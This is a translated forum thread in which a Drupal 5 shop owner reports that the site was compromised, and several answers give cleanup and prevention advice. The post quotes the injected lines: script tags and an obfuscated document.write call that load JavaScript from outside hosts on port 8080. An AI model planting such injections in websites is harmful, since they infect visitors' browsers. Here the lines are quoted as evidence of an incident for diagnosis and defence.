Был ли атакован мой сайт?
Речь идет об интернет-магазине на основе Drupal 5.
Внезапно это перестало работать. При доступе к сайту появилась эта ошибка:
Ошибка разбора: синтаксическая ошибка, неожиданное '<' в /home/public_html/index.php в строке 38
После дальнейшей проверки я обнаружил следующие две строки в конце index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
После удаления этих двух строк сайт, кажется, снова работает нормально.
Но после того, как появилось больше проблем (с редактированием страниц), я обнаружил, что на самом деле все файлы *.js "заражены". Все они содержат дополнительную строку в конце:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Этот сайт был взломан? После поиска в Google для blog.nodisposable.com ничего интересного не появляется. Сам этот сайт кажется законным. Это наверное взломано само собой?
Кто-нибудь может объяснить, как это могло произойти? Что я могу сделать, чтобы изменить это? И что я могу сделать, чтобы избежать этого в будущем?
Обновить
После восстановления резервной копии веб-сайта (не базы данных) это произошло снова, но теперь тег сценария указал на dolfy.sedonahyperbarics.com:8080/XHTML.js,
Судя по всему, было создано много случайных учетных записей пользователей в Drupal. Так что это может быть признаком того, что на самом деле это была уязвимость Drupal.
Мы удалили их, и создание учетной записи пользователя было разрешено только администраторам (это должно было быть с самого начала, я знаю:-s). Мы также изменили пароль администратора на более безопасный.
Будем надеяться, что это не вернется сейчас.
4 ответа
Если его взломали, вы не знаете, была ли установлена задняя дверь.
Возможно, вам придется переустановить из заведомо исправной резервной копии после переформатирования.
Никогда не доверяйте системе, в которой был нарушитель.
Чтобы предотвратить это в будущем, вам нужно следить за обновлениями и подписываться на списки, которые постоянно обновляются с учетом уязвимостей и лучших рекомендаций для используемого вами программного обеспечения (списки drupal, списки безопасности вашей платформы и т. Д.) а также блокировать сервисы только для тех пользователей, которые необходимы для использования системы, используя безопасные пароли, ничего не делая в открытом тексте и все остальное в соответствии с рекомендациями по безопасности, что выходит за рамки контекста ответа здесь. И сохраняйте хорошие резервные копии и включайте обнаружение вторжений (например, систему, подобную Tripwire), чтобы проверить активность злоумышленников.
Хотя каждый такой хак, особенно с повторным заражением, был полностью основан на моем собственном опыте, он был вызван тем, что у кого-то с FTP-доступом к серверу был заражен локальный компьютер и что-то украло учетные данные - вы хотите проверить журналы FTP и убедиться, что вы признаете все IP-адреса и обновления действительными - если что-то заражает, вы должны увидеть это там довольно легко, если это так.
Я видел что-то очень похожее (почти идентичное), но не связанное с Drupal, и это определенно был взлом.
Как говорят другие, трудно узнать без дополнительной информации о вашей среде. Быстрая вещь, которую вы можете сделать, чтобы заблокировать его обслуживание, - это вставить в ваш файл.htaccess директиву, которая будет отклонять или перенаправлять любые запросы в этот файл.js.
Да, ты боишься. "Как", к сожалению, невозможно сказать без ОЧЕНЬ больших затрат времени и усилий. Это могла быть уязвимость в вашей установке Drupal (или одного из ее модулей), это могла быть уязвимость в другом приложении на том же сервере, это мог быть слабый (или украденный) пароль FTP и т. Д. возможных точек входа.